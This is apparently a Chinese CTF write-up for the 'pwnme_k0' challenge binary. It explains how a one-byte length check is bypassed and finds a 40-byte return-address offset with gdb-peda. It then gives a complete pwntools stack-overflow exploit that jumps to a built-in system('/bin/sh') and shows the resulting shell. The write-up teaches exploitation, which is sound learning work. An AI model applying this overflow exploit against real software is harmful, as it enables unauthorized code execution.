三个白帽

发表于

0x00 前言

这道题貌似不止一种解法,挺有意思的一道题

0x01 程序分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
mask@mask-virtual-machine:~/sangebaimao$ ./pwnme_k0 
**********************************************
**
*Welcome to sangebaimao,Pwnn me and have fun!*
**
**********************************************
Register Account first!
Input your username(max lenth:20): 
mask
Input your password(max lenth:20): 
abcd
Register Success!!
1.Sh0w Account Infomation!
2.Ed1t Account Inf0mation!
3.QUit sangebaimao:(
>1
Welc0me to sangebaimao!
mask
abcd
1.Sh0w Account Infomation!
2.Ed1t Account Inf0mation!
3.QUit sangebaimao:(
>2
please input new username(max lenth:20): 
test
please input new password(max lenth:20): 
1234
1.Sh0w Account Infomation!
2.Ed1t Account Inf0mation!
3.QUit sangebaimao:(
>3
byebyeT.T
mask@mask-virtual-machine:~/sangebaimao$

大致晓得了有啥功能,拉到IDA查看:

看到这,然后再切回反汇编窗口查看:

这里我之前也没有注意到,我当时想很像一个栈溢出漏洞,但是它这里检查了长度,我应该怎样去绕过,然后看了一下别人的wp,发现,靠,这里比较用的是前八个字节,那么就好办了,限制的长度为20个字节,也就是0x14,那么比如当我的长度为256时,也就是0x100,那么al存储的就是00,那么就绕过了长度检测

在看这,程序提供了一个可以利用的system("/bin/sh")调用,我们溢出后直接返回到这即可

再来找找溢出的偏移:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
mask@mask-virtual-machine:~/sangebaimao$ gdb ./pwnme_k0 
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./pwnme_k0...(no debugging symbols found)...done.
gdb-peda$ pattern create 256
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G'
gdb-peda$ r
Starting program: /home/mask/sangebaimao/pwnme_k0 
**********************************************
**
*Welcome to sangebaimao,Pwnn me and have fun!*
**
**********************************************
Register Account first!
Input your username(max lenth:20): 
test
Input your password(max lenth:20): 
123
Register Success!!
1.Sh0w Account Infomation!
2.Ed1t Account Inf0mation!
3.QUit sangebaimao:(
>2
please input new username(max lenth:20): 
mask
please input new password(max lenth:20): 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffda60 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
RBX: 0x0 
RCX: 0xffffde0a 
RDX: 0x4 
RSI: 0x7fffffffdcd0 --> 0xffffde0a 
RDI: 0x7fffffffdb60 --> 0x7f00ffffde0a 
RBP: 0x6141414541412941 ('A)AAEAAa')
RSP: 0x7fffffffda88 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%"...)
RIP: 0x400b06 (ret)
R8 : 0x7ffff7fde740 (0x00007ffff7fde740)
R9 : 0x726f777373617020 (' passwor')
R10: 0x656c2078616d2864 ('d(max le')
R11: 0x7ffff7b8d760 --> 0xfff247a0fff24790 
R12: 0x4007b0 (xorebp,ebp)
R13: 0x7fffffffded0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400aff:	call   0x400748
   0x400b04:	nop
   0x400b05:	leave  
=> 0x400b06:	ret
   0x400b07:	push   rbp
   0x400b08:	movrbp,rsp
   0x400b0b:	movedx,0x1a
   0x400b10:	movesi,0x4010c3
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffda88 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%"...)
0008| 0x7fffffffda90 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA"...)
0016| 0x7fffffffda98 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G"...)
0024| 0x7fffffffdaa0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G\n\336\377\377")
0032| 0x7fffffffdaa8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G\n\336\377\377")
0040| 0x7fffffffdab0 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G\n\336\377\377")
0048| 0x7fffffffdab8 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G\n\336\377\377")
0056| 0x7fffffffdac0 ("6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G\n\336\377\377")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000400b06 in ?? ()
gdb-peda$ x/8gx$rsp 
0x7fffffffda88:	0x4141464141304141	0x4147414131414162
0x7fffffffda98:	0x4841413241416341	0x4141334141644141
0x7fffffffdaa8:	0x4134414165414149	0x3541416641414a41
0x7fffffffdab8:	0x41416741414b4141	0x416841414c414136
gdb-peda$ pattern offset 0x4141464141304141
4702116732032008513 found at offset: 40

那么写一下exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *

    

r = process('./pwnme_k0')
r.recvuntil('username(max lenth:20): ')
r.sendline('mask')
r.recvuntil('password(max lenth:20): ')
r.sendline('12345')
r.recvuntil('>')
r.sendline('2')
r.recvuntil('new username(max lenth:20): ')
r.sendline('test')
r.recvuntil('new password(max lenth:20): ')
passexp='A'*40+p64(0x4008a6)+'B'*208
r.sendline(passexp)
r.interactive()

运行:

1
2
3
4
5
6
7
8
9
mask@mask-virtual-machine:~/sangebaimao$ python exp.py 
[+] Starting local process './pwnme_k0': pid 13114
[*] Switching to interactive mode

$ id
uid=1000(mask) gid=1000(mask) 组=1000(mask),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare),999(docker)
$ whoami
mask
$